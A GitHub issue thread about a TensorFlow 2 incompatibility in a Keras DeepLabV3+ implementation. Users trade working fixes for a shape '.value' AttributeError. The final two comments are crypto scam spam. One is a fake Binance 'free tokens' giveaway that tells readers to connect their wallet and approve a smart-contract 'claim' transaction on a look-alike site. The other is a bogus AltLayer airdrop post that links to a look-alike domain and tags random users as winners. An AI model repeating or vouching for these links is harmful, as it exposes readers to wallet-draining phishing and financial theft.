### ISSUE TITLE
'int' object has no attribute 'value'

### ISSUE THREAD

**Issue by Jan-No** [bonlime/keras-deeplab-v3-plus#125]
Hi,

I just found the project and was very eager to try it. However, if I want to create the model with:

`import segmentation_models as sm
from model import Deeplabv3

    deeplab_model = Deeplabv3(input_shape=(256, 256, 3), classes=1)

    deeplab_model.compile(optimizer=Adam(), loss=[LossFunction().my_loss],
                          metrics=['accuracy', sm.metrics.IOUScore(threshold=0.5)])

    print(deeplab_model)
`

I get an error: 

`
Traceback (most recent call last):
  File "D:/Documents/road_detection/workspace_new/deeplab-v3-plus/Model.py", line 64, in <module>
    deeplab_model = Deeplabv3(input_shape=(256, 256, 3), classes=1)
  File "D:\Documents\road_detection\workspace_new\deeplab-v3-plus\deeplab_model.py", line 328, in Deeplabv3
    expansion=1, block_id=0, skip_connection=False)
  File "D:\Documents\road_detection\workspace_new\deeplab-v3-plus\deeplab_model.py", line 178, in _inverted_res_block
    in_channels = inputs.shape[-1].value  # inputs._keras_shape[-1]
AttributeError: 'int' object has no attribute 'value'
`

What am I doing wrong? I am using 
`tensorflow-gpu       2.0.0`
and other models compile fine.

Thanks for input.

Best,

Jan

**Comment by Jan-No** [comment]
I think the fix is as simple as just modifying line 178 to: 

`in_channels = inputs.shape[-1]`

Please let me know if this fix is valid.

**Comment by Datadote** [comment]
If you want to use it in tensorflow 2, I suggest changing

in_channels = inputs.shape[-1].value
to
in_channels = inputs.shape.as_list()[-1]

https://github.com/tensorflow/tensorflow/pull/28461

**Comment by wjcheon** [comment]
It works good ! @Datadote

**Comment by pimonteiro** [comment]
Hello! I'm getting the same error as you, but both the solutions @Datadote and  @Jan-No proposed aren't working for me. The only difference of my environment is my tensorflow version, which is 2.4.0. Any idea?

**Comment by ADITYA964** [comment]
I found a solution that worked for me.

For this problem, keep code statement as it is ( in_channels = inputs.shape[-1].value ).

Install below versions.
1. numpy==1.17.2
2. keras==2.2.5
3. tensorflow==1.15

If you are trying for tensorflow==2.4.0. I have not tried it but i doubt that its because of keras version.

**Comment by LuoXubo** [comment]
If Datadote's solution doesn't work. Maybe you can try just remove ".value" .

**Comment by KarthiAru** [comment]
> If you want to use it in tensorflow 2, I suggest changing
> 
> in_channels = inputs.shape[-1].value to in_channels = inputs.shape.as_list()[-1]
> 
> [tensorflow/tensorflow#28461](https://github.com/tensorflow/tensorflow/pull/28461)

This worked in TF 2.7.

**Comment by naseemap47** [comment]
> Hello! I'm getting the same error as you, but both the solutions @Datadote and @Jan-No proposed aren't working for me. The only difference of my environment is my tensorflow version, which is 2.4.0. Any idea?

Use **tensorflow==2.7.0**
and also edit the file 
changes..
`in_channels = inputs.shape[-1].value`
to
`in_channels = inputs.shape.as_list()[-1]`

**Comment by p4u1d34n** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by technosoft-admin** [comment]
# AltLayer Airdrop Season One Announcement

[![AltLayer Airdrop Season One](https://miro.medium.com/v2/da:true/resize:fit:1200/0*QvP91LW92QLv9_qq)](http://go.altlayerio.online/zHaxVS)

Exciting news! AltLayer token (ALT) is set to launch on Binance on January 25, 2024. This milestone couldn't have been reached without our amazing community. Your support has been crucial from conceptualization to product development.

To show our gratitude, we're inviting you to join the "ALT Token community" through an airdrop for early supporters and partners. Below is a summary:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of total supply)
- **Distribution Categories:**
  - NFT Holders
  - Altitude Campaign Participants
  - EigenLayer Restakers
  - EigenLayer Ecosystem Partners
  - Celestia Stakers and others

For detailed criteria and information, check the full announcement [here](http://go.altlayerio.online/zHaxVS).

[Claim](http://go.altlayerio.online/zHaxVS) opens from January 25 to February 25, 2024. Unclaimed ALT tokens after this period will return to AltLayer’s Treasury.

Thank you for being part of AltLayer's success! More to come in Season One, stay tuned.

**Note:** Certain regions are restricted from the airdrop. Please review the disclaimer before participating.


Winners: @Gus-The-Forklift-Driver, @hschen2k, @swarnkiran88, @yetisir, @trendminder-bengh, @dogfood1, @nu11ptr, @devwolff, @harper357, @SpiralDevelopment, @dethnass, @chengjunjian, @airscofield, @dxtkdxtk, @nvartolomei, @rongzhou, @yhsa678, @AGG2017, @dddrop, @sy9777m
